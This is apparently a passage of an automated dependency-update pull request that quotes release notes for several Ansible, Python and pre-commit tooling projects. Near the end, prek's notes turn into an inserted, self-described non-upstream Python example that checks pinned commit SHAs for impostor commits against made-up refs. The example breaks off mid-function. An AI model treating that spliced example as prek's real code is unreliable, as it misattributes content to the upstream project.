Source](https://redirect.github.com/ansible/ansible-navigator/compare/v26.1.3...v26.4.0)
#### Maintenance
- chore(deps): update all dependencies
([#​2106](https://redirect.github.com/ansible/ansible-navigator/issues/2106))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​2100](https://redirect.github.com/ansible/ansible-navigator/issues/2100))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- ci: Fix CI, assisted by AI
([#​2104](https://redirect.github.com/ansible/ansible-navigator/issues/2104))
[@​Andersson007](https://redirect.github.com/Andersson007)
</details>
<details>
<summary>ansible/actions (ansible/actions)</summary>
### [`v1.1.2`](https://redirect.github.com/ansible/actions/releases/tag/v1.1.2)
[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1.1.1...v1.1.2)
#### Fixes
- fix: make renovate and md hook use version from action
([#​112](https://redirect.github.com/ansible/actions/issues/112))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: force use of newer node
([#​121](https://redirect.github.com/ansible/actions/issues/121))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Maintenance
- chore(deps): update all dependencies pep621
([#​120](https://redirect.github.com/ansible/actions/issues/120))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​119](https://redirect.github.com/ansible/actions/issues/119))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
### [`v1.1.1`](https://redirect.github.com/ansible/actions/releases/tag/v1.1.1)
[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1.1.0...v1.1.1)
#### Fixes
- fix: address issue with shellcheck calling
([#​118](https://redirect.github.com/ansible/actions/issues/118))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Maintenance
- chore(deps): update all dependencies pep621
([#​117](https://redirect.github.com/ansible/actions/issues/117))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​116](https://redirect.github.com/ansible/actions/issues/116))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update dependencies
([#​115](https://redirect.github.com/ansible/actions/issues/115))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies pep621
([#​114](https://redirect.github.com/ansible/actions/issues/114))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​113](https://redirect.github.com/ansible/actions/issues/113))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
### [`v1.1.0`](https://redirect.github.com/ansible/actions/releases/tag/v1.1.0)
[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1.0.1...v1.1.0)
#### Features
- feat: add pyright hook definition
([#​111](https://redirect.github.com/ansible/actions/issues/111))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Fixes
- fix: display gitleaks version before calling it
([#​108](https://redirect.github.com/ansible/actions/issues/108))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: allow renovate to create up to 3 PRs
([#​107](https://redirect.github.com/ansible/actions/issues/107))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Maintenance
- chore(deps): update actions/download-artifact action
([#​109](https://redirect.github.com/ansible/actions/issues/109))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies pep621
([#​110](https://redirect.github.com/ansible/actions/issues/110))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​106](https://redirect.github.com/ansible/actions/issues/106))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
### [`v1.0.1`](https://redirect.github.com/ansible/actions/releases/tag/v1.0.1)
[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1...v1.0.1)
#### Fixes
- fix: configure renovate to bump minimal versions on security alerts
([#​104](https://redirect.github.com/ansible/actions/issues/104))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: make codecov curl validation retry
([#​103](https://redirect.github.com/ansible/actions/issues/103))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: run codespell as a tool
([#​102](https://redirect.github.com/ansible/actions/issues/102))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Maintenance
- chore(deps): update all dependencies to
[`bbbca2d`](https://redirect.github.com/ansible/actions/commit/bbbca2d)
([#​100](https://redirect.github.com/ansible/actions/issues/100))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
### [`v1.0.0`](https://redirect.github.com/ansible/actions/releases/tag/v1.0.0)
[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1...v1)
#### Features
- feat: add pydoclint hook definition
([#​99](https://redirect.github.com/ansible/actions/issues/99))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Fixes
- fix: fix shellcheck hook in local testing
([#​98](https://redirect.github.com/ansible/actions/issues/98))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: use sh when calling system hooks
([#​97](https://redirect.github.com/ansible/actions/issues/97))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: cancel current workflow when autofix is applied
([#​95](https://redirect.github.com/ansible/actions/issues/95))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: prevent prek node install from touching package-lock.json file
([#​94](https://redirect.github.com/ansible/actions/issues/94))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Maintenance
- chore(deps): update all dependencies
([#​93](https://redirect.github.com/ansible/actions/issues/93))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
### [`v1`](https://redirect.github.com/ansible/actions/compare/v0.5.1...v1)
[Compare
Source](https://redirect.github.com/ansible/actions/compare/v0.5.1...v1)
</details>
<details>
<summary>ansible/ansible-lint (ansible/ansible-lint)</summary>
### [`v26.4.0`](https://redirect.github.com/ansible/ansible-lint/releases/tag/v26.4.0)
[Compare
Source](https://redirect.github.com/ansible/ansible-lint/compare/v26.3.0...v26.4.0)
#### Fixes
- fix: remove deprecated apt\_key module from examples and builtins
([#​5000](https://redirect.github.com/ansible/ansible-lint/issues/5000))
[@​cidrblock](https://redirect.github.com/cidrblock)
- fix(security): update dependencies \[SECURITY]
([#​5010](https://redirect.github.com/ansible/ansible-lint/issues/5010))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- fix: avoid permission error when linting /tmp files
([#​5009](https://redirect.github.com/ansible/ansible-lint/issues/5009))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: reapply false positive patch for no-changed-when rule
([#​4989](https://redirect.github.com/ansible/ansible-lint/issues/4989))
[@​Red-GV](https://redirect.github.com/Red-GV)
- docs: fix inaccuracies found during documentation audit
([#​4999](https://redirect.github.com/ansible/ansible-lint/issues/4999))
[@​cidrblock](https://redirect.github.com/cidrblock)
- fix: support collection format in mock\_roles
([#​4980](https://redirect.github.com/ansible/ansible-lint/issues/4980))
[@​emmanuel-ferdman](https://redirect.github.com/emmanuel-ferdman)
- fix(security): update dependencies \[SECURITY]
([#​4993](https://redirect.github.com/ansible/ansible-lint/issues/4993))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
#### Maintenance
- chore: update hooks
([#​5008](https://redirect.github.com/ansible/ansible-lint/issues/5008))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- chore: implement workaround for coverage merging failure
([#​5006](https://redirect.github.com/ansible/ansible-lint/issues/5006))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- Add support for upcoming Ubuntu 26.04
([#​4995](https://redirect.github.com/ansible/ansible-lint/issues/4995))
[@​Andiroid](https://redirect.github.com/Andiroid)
- chore(deps): update all dependencies pep621
([#​4994](https://redirect.github.com/ansible/ansible-lint/issues/4994))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): bump black from 26.1.0 to 26.3.1 in /.config
([#​4991](https://redirect.github.com/ansible/ansible-lint/issues/4991))
@​[dependabot\[bot\]](https://redirect.github.com/apps/dependabot)
###
[`v26.3.0`](https://redirect.github.com/ansible/ansible-lint/releases/tag/v26.3.0)
[Compare
Source](https://redirect.github.com/ansible/ansible-lint/compare/v26.2.0...v26.3.0)
##### Features
- feat: add jinja2-template-extension opt-in rule
([#​4979](https://redirect.github.com/ansible/ansible-lint/issues/4979))
[@​djdanielsson](https://redirect.github.com/djdanielsson)
##### Fixes
- fix: Add missing version\_changed var to ComplexityRule class
([#​4987](https://redirect.github.com/ansible/ansible-lint/issues/4987))
[@​thrashwerk](https://redirect.github.com/thrashwerk)
##### Maintenance
- chore: pre-commit autoupdate
([#​4986](https://redirect.github.com/ansible/ansible-lint/issues/4986))
@​[pre-commit-ci\[bot\]](https://redirect.github.com/apps/pre-commit-ci)
- chore(deps): update all dependencies pep621
([#​4984](https://redirect.github.com/ansible/ansible-lint/issues/4984))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​4983](https://redirect.github.com/ansible/ansible-lint/issues/4983))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps-dev): bump minimatch from 9.0.5 to 10.2.4 in /test/schemas
([#​4982](https://redirect.github.com/ansible/ansible-lint/issues/4982))
@​[dependabot\[bot\]](https://redirect.github.com/apps/dependabot)
</details>
<details>
<summary>ansible/team-devtools (ansible/team-devtools)</summary>
###
[`v26.4.0`](https://redirect.github.com/ansible/team-devtools/releases/tag/v26.4.0)
[Compare
Source](https://redirect.github.com/ansible/team-devtools/compare/v26.2.2...v26.4.0)
#### Fixes
- fix: stop if unsigned commits are detected
([#​438](https://redirect.github.com/ansible/team-devtools/issues/438))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Maintenance
- chore(deps): update pep621
([#​432](https://redirect.github.com/ansible/team-devtools/issues/432))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
###
[`v26.2.2`](https://redirect.github.com/ansible/team-devtools/releases/tag/v26.2.2)
[Compare
Source](https://redirect.github.com/ansible/team-devtools/compare/v26.2.1...v26.2.2)
#### Maintenance
- chore: dump event info for test pipeline
([#​427](https://redirect.github.com/ansible/team-devtools/issues/427))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- chore(deps): update all dependencies
([#​426](https://redirect.github.com/ansible/team-devtools/issues/426))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
###
[`v26.2.1`](https://redirect.github.com/ansible/team-devtools/releases/tag/v26.2.1)
[Compare
Source](https://redirect.github.com/ansible/team-devtools/compare/v26.2.0...v26.2.1)
#### Fixes
- fix: make slack notification use markdown
([#​424](https://redirect.github.com/ansible/team-devtools/issues/424))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: make slack alert easier to read
([#​423](https://redirect.github.com/ansible/team-devtools/issues/423))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
</details>
<details>
<summary>astral-sh/uv-pre-commit (astral-sh/uv-pre-commit)</summary>
###
[`v0.11.8`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.8)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.7...0.11.8)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.8>
###
[`v0.11.7`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.7)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.6...0.11.7)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.7>
###
[`v0.11.6`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.6)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.5...0.11.6)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.6>
###
[`v0.11.5`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.5)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.4...0.11.5)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.5>
###
[`v0.11.4`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.4)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.3...0.11.4)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.4>
###
[`v0.11.3`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.3)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.2...0.11.3)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.3>
###
[`v0.11.2`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.2)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.1...0.11.2)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.2>
###
[`v0.11.1`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.1)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.0...0.11.1)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.1>
###
[`v0.11.0`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.0)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.12...0.11.0)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.0>
###
[`v0.10.12`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.12)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.11...0.10.12)
See: <https://github.com/astral-sh/uv/releases/tag/0.10.12>
###
[`v0.10.11`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.11)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.10...0.10.11)
See: <https://github.com/astral-sh/uv/releases/tag/0.10.11>
###
[`v0.10.10`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.10)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.9...0.10.10)
See: <https://github.com/astral-sh/uv/releases/tag/0.10.10>
###
[`v0.10.9`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.9)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.8...0.10.9)
See: <https://github.com/astral-sh/uv/releases/tag/0.10.9>
###
[`v0.10.8`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.8)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.7...0.10.8)
See: <https://github.com/astral-sh/uv/releases/tag/0.10.8>
</details>
<details>
<summary>biomejs/pre-commit (biomejs/pre-commit)</summary>
###
[`v2.4.14`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.13...v2.4.14)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.13...v2.4.14)
###
[`v2.4.13`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.12...v2.4.13)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.12...v2.4.13)
###
[`v2.4.12`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.11...v2.4.12)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.11...v2.4.12)
###
[`v2.4.11`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.10...v2.4.11)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.10...v2.4.11)
###
[`v2.4.10`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.9...v2.4.10)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.9...v2.4.10)
###
[`v2.4.9`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.8...v2.4.9)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.8...v2.4.9)
###
[`v2.4.8`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.7...v2.4.8)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.7...v2.4.8)
###
[`v2.4.7`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.6...v2.4.7)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.6...v2.4.7)
###
[`v2.4.6`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.5...v2.4.6)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.5...v2.4.6)
###
[`v2.4.5`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.4...v2.4.5)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.4...v2.4.5)
</details>
<details>
<summary>pypa/build (build)</summary>
###
[`v1.5.0`](https://redirect.github.com/pypa/build/releases/tag/1.5.0)
[Compare
Source](https://redirect.github.com/pypa/build/compare/1.4.4...1.5.0)
#### What's Changed
- ci: try to improve release docs by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1051](https://redirect.github.com/pypa/build/pull/1051)
- feat: drop 3.9, require 3.10+ by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1036](https://redirect.github.com/pypa/build/pull/1036)
- chore: tox toml by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1033](https://redirect.github.com/pypa/build/pull/1033)
- fix: api should not ignore installed, only CLI by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1056](https://redirect.github.com/pypa/build/pull/1056)
**Full Changelog**:
<https://github.com/pypa/build/compare/1.4.4...1.5.0>
###
[`v1.4.4`](https://redirect.github.com/pypa/build/releases/tag/1.4.4)
[Compare
Source](https://redirect.github.com/pypa/build/compare/1.4.3...1.4.4)
#### What's Changed
- 🐛 fix(release): generate consistent CHANGELOG heading levels by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1032](https://redirect.github.com/pypa/build/pull/1032)
- docs: move source links by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1034](https://redirect.github.com/pypa/build/pull/1034)
- revert: drop PEP 660 change by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1039](https://redirect.github.com/pypa/build/pull/1039)
- fix: ignore installed when running pip by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1040](https://redirect.github.com/pypa/build/pull/1040)
- fix: revert part of
[#​973](https://redirect.github.com/pypa/build/issues/973) by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1044](https://redirect.github.com/pypa/build/pull/1044)
- chore: report coverage failure lines by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1046](https://redirect.github.com/pypa/build/pull/1046)
- tests: fix issue with uv run by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1048](https://redirect.github.com/pypa/build/pull/1048)
- docs: reorganize testing docs for copy/paste by
[@​abitrolly](https://redirect.github.com/abitrolly) in
[#​1043](https://redirect.github.com/pypa/build/pull/1043)
- tests: keep environment from leaking in Python 3.15 by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1049](https://redirect.github.com/pypa/build/pull/1049)
- docs: fix issue with changelog generation by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1050](https://redirect.github.com/pypa/build/pull/1050)
**Full Changelog**:
<https://github.com/pypa/build/compare/1.4.3...1.4.4>
###
[`v1.4.3`](https://redirect.github.com/pypa/build/releases/tag/1.4.3)
[Compare
Source](https://redirect.github.com/pypa/build/compare/1.4.2...1.4.3)
##### What's Changed
- 🐛 fix(api): resolve thread-safety races in build API by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1015](https://redirect.github.com/pypa/build/pull/1015)
- 🐛 fix(builder): validate backend-path entries exist on disk by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1016](https://redirect.github.com/pypa/build/pull/1016)
- test: cover config settings build paths by
[@​terminalchai](https://redirect.github.com/terminalchai) in
[#​992](https://redirect.github.com/pypa/build/pull/992)
- Add kind=(step, ) for root messages with \* by
[@​abitrolly](https://redirect.github.com/abitrolly) in
[#​973](https://redirect.github.com/pypa/build/pull/973)
- fix: correct changelog category ordering by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1017](https://redirect.github.com/pypa/build/pull/1017)
- 🐛 fix(cli): show full dependency chain in missing deps error by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1019](https://redirect.github.com/pypa/build/pull/1019)
- tests: fully annotate by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1020](https://redirect.github.com/pypa/build/pull/1020)
- chore: lazy imports by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1021](https://redirect.github.com/pypa/build/pull/1021)
- chore: adding more ruff codes by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1022](https://redirect.github.com/pypa/build/pull/1022)
- tests: improve annotations by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1023](https://redirect.github.com/pypa/build/pull/1023)
- 🧪 test(coverage): achieve 100% test coverage by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1018](https://redirect.github.com/pypa/build/pull/1018)
- chore: add ruff PT by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1025](https://redirect.github.com/pypa/build/pull/1025)
- chore: add ruff PYI by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1026](https://redirect.github.com/pypa/build/pull/1026)
- chore: add ruff SIM/RET by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1028](https://redirect.github.com/pypa/build/pull/1028)
- 🐛 fix(env): strip PYTHONPATH from isolated builds by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1024](https://redirect.github.com/pypa/build/pull/1024)
- chore: use ruff ALL by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1029](https://redirect.github.com/pypa/build/pull/1029)
- 🐛 fix(env): prevent pip credential hang with private indexes by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1030](https://redirect.github.com/pypa/build/pull/1030)
- 🐛 fix(check\_dependency): verify URL reqs via PEP 610 by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1027](https://redirect.github.com/pypa/build/pull/1027)
##### New Contributors
- [@​terminalchai](https://redirect.github.com/terminalchai) made
their first contribution in
[#​992](https://redirect.github.com/pypa/build/pull/992)
**Full Changelog**:
<https://github.com/pypa/build/compare/1.4.2...1.4.3>
</details>
<details>
<summary>pallets/click (click)</summary>
###
[`v8.3.3`](https://redirect.github.com/pallets/click/compare/8.3.2...8.3.3)
[Compare
Source](https://redirect.github.com/pallets/click/compare/8.3.2...8.3.3)
</details>
<details>
<summary>tox-dev/py-filelock (filelock)</summary>
###
[`v3.29.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.29.0)
[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.28.0...3.29.0)
#### What's Changed
- 🐛 fix(async): use single-thread executor for lock consistency by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#533](https://redirect.github.com/tox-dev/filelock/pull/533)
- ✨ feat(soft): enable stale lock detection on Windows by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#534](https://redirect.github.com/tox-dev/filelock/pull/534)
**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.28.0...3.29.0>
###
[`v3.28.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.28.0)
[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.25.2...3.28.0)
##### What's Changed
- 🐛 fix(ci): unbreak release workflow, publish to PyPI again by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#529](https://redirect.github.com/tox-dev/filelock/pull/529)
**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.27.0...3.28.0>
</details>
<details>
<summary>j178/prek (prek)</summary>
###
[`v0.3.11`](https://redirect.github.com/j178/prek/blob/HEAD/CHANGELOG.md#0311)
Released on 2026-04-27.
##### Highlights
Hook entries now have an explicit `shell` option for shell snippets. Set
`shell: sh`, `bash`, `pwsh`, `powershell`, or `cmd` when an entry should be
evaluated by that shell; leaving it unset keeps prek's direct argv execution.
`prek auto-update` can now filter tag candidates before choosing an update.
Both options take glob patterns: use `--include-tag` to only consider matching
tag names, and `--exclude-tag` to skip matching tags such as moving tags or
prereleases.
##### Enhancements
- Add `auto-update --exclude-repo <repo>` to skip repos
([#​1983](https://redirect.github.com/j178/prek/pull/1983))
- Add `auto-update --exit-code` to exit with non-zero on updates
([#​2002](https://redirect.github.com/j178/prek/pull/2002))
- Add `auto-update --include-tag <pattern>`/`--exclude-tag <pattern>` to
filter tags
([#​1984](https://redirect.github.com/j178/prek/pull/1984))
- Adds an explicit `shell` hook option for entries that should run as
shell source
([#​2004](https://redirect.github.com/j178/prek/pull/2004))
- Make `--hook-dir` optional for hook-impl
([#​1989](https://redirect.github.com/j178/prek/pull/1989))
- Skip shim warning when `--script-version` is missing
([#​1990](https://redirect.github.com/j178/prek/pull/1990))
##### Bug fixes
- Install Ruby executable in gem bin
([#​2017](https://redirect.github.com/j178/prek/pull/2017))
- Use dedicated Android npm package
([#​1982](https://redirect.github.com/j178/prek/pull/1982))
- Use stable repo keys without breaking cached clones
([#​1995](https://redirect.github.com/j178/prek/pull/1995))
##### Documentation
- Explain prek name
([#​1980](https://redirect.github.com/j178/prek/pull/1980))
- Clarify `pass_filenames` concurrency docs
([#​1999](https://redirect.github.com/j178/prek/pull/1999))
- Reorganize documentation references
([#​2005](https://redirect.github.com/j178/prek/pull/2005))
- Clarify hook author manifest env docs
([#​1991](https://redirect.github.com/j178/prek/pull/1991))
- docs: add Sentry to users list
([#​1981](https://redirect.github.com/j178/prek/pull/1981))
##### Contributors
- [@​j178](https://redirect.github.com/j178)
###
[`v0.3.10`](https://redirect.github.com/j178/prek/blob/HEAD/CHANGELOG.md#0310)
Released on 2026-04-21.
##### Enhancements
- Disallow rev for non-remote repos in schema
([#​1964](https://redirect.github.com/j178/prek/pull/1964))
- Hide up-to-date output in non-verbose mode
([#​1942](https://redirect.github.com/j178/prek/pull/1942))
- Improve merge conflict marker detection
([#​1937](https://redirect.github.com/j178/prek/pull/1937))
- Keep finished hooks visible
([#​1967](https://redirect.github.com/j178/prek/pull/1967))
- Preserve frozen comment spacing in auto-update
([#​1945](https://redirect.github.com/j178/prek/pull/1945))
- Reimplement `@j178/prek` npm package
([#​1973](https://redirect.github.com/j178/prek/pull/1973))
##### Bug fixes
- Prefer stable Rust toolchains
([#​1974](https://redirect.github.com/j178/prek/pull/1974))
##### Documentation
- Add `SKILL.md` for prek
([#​1950](https://redirect.github.com/j178/prek/pull/1950))
- Document `gh skill install j178/prek prek` to install prek skill for
agents ([#​1951](https://redirect.github.com/j178/prek/pull/1951))
- Improve compatibility and migration docs
([#​1940](https://redirect.github.com/j178/prek/pull/1940))
##### Other changes
- Sync latest identify tags
([#​1947](https://redirect.github.com/j178/prek/pull/1947))
##### Contributors
- [@​github-actions](https://redirect.github.com/github-actions)
- [@​renovate](https://redirect.github.com/renovate)
- [@​j178](https://redirect.github.com/j178)
###
[`v0.3.9`](https://redirect.github.com/j178/prek/blob/HEAD/CHANGELOG.md#039)
Released on 2026-04-13.
##### Highlight
`prek auto-update` is now stricter about pinned revisions and more
useful in CI.
It now keeps `rev` and `# frozen:` comments in sync, can detect
[impostor commits](https://docs.zizmor.sh/audits/#impostor-commit) when
validating pinned SHAs,
and lets you use `prek auto-update --check` to fail on both available
updates and frozen-ref
mismatches without rewriting the config.
Examples:
```console
$ prek auto-update
# updates revs and repairs stale `# frozen:` comments
$ prek auto-update --freeze
# writes frozen SHAs with matching `# frozen: <tag>` comments
$ prek auto-update --check
# exits non-zero when updates are available, a `# frozen:` comment is stale,
# or a pinned SHA does not belong to the fetched upstream refs
```
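The two `--check` conditions described above, as an added Python example that is not prek's own code: it scans the `rev:` lines of a constructed `.pre-commit-config.yaml`, compares each pinned SHA against a constructed ref table that stands in for `git ls-remote` output (the repo URL and SHAs are made up), and reports stale `# frozen:` comments, impostor commits and revs that are not pinned to a SHA at all. It is stricter than a real implementation in one respect, noted in the code: it only accepts SHAs that are the tip of some upstream branch or tag.

```python
"""Check pinned `rev:` values in .pre-commit-config.yaml against upstream refs.

Added example, not prek's own code: a simplified version of the two checks the
release notes describe, a `# frozen: <tag>` comment that no longer matches its
SHA and a pinned SHA that no fetched upstream ref points at (an "impostor
commit"). The ref table, repo URL and SHAs below are constructed test data.
"""
import re
from dataclasses import dataclass

# Constructed stand-in for `git ls-remote <repo>`: ref name -> SHA. ls-remote
# only exposes ref tips, so a SHA counts as legitimate only if some branch or
# tag points directly at it (older commits would need merge-base checks).
UPSTREAM_REFS = {
    "https://example.invalid/org/hooks": {
        "refs/tags/v1.2.0": "1111111111111111111111111111111111111111",
        "refs/tags/v1.3.0": "2222222222222222222222222222222222222222",
        "refs/heads/main": "2222222222222222222222222222222222222222",
    },
}

# Constructed config: stale frozen comment, impostor SHA, unpinned tag, good pin.
SAMPLE_CONFIG = """\
repos:
  - repo: https://example.invalid/org/hooks
    rev: 1111111111111111111111111111111111111111  # frozen: v1.3.0
  - repo: https://example.invalid/org/hooks
    rev: 3333333333333333333333333333333333333333  # frozen: v1.3.0
  - repo: https://example.invalid/org/hooks
    rev: v1.3.0
  - repo: https://example.invalid/org/hooks
    rev: 2222222222222222222222222222222222222222  # frozen: v1.3.0
"""

REPO_RE = re.compile(r"^\s*-\s*repo:\s*(\S+)\s*$")
REV_RE = re.compile(r"""^\s*rev:\s*['"]?([^'"\s#]+)['"]?\s*(?:#\s*frozen:\s*(\S+))?\s*$""")
FULL_SHA_RE = re.compile(r"[0-9a-fA-F]{40}")


@dataclass
class Finding:
    repo: str
    rev: str
    kind: str  # "ok" | "unpinned" | "impostor" | "stale-frozen"
    detail: str


def parse_pins(config_text):
    """Return (repo, rev, frozen_tag_or_None) tuples from the flat repo:/rev: layout."""
    repo, pins = None, []
    for line in config_text.splitlines():
        if m := REPO_RE.match(line):
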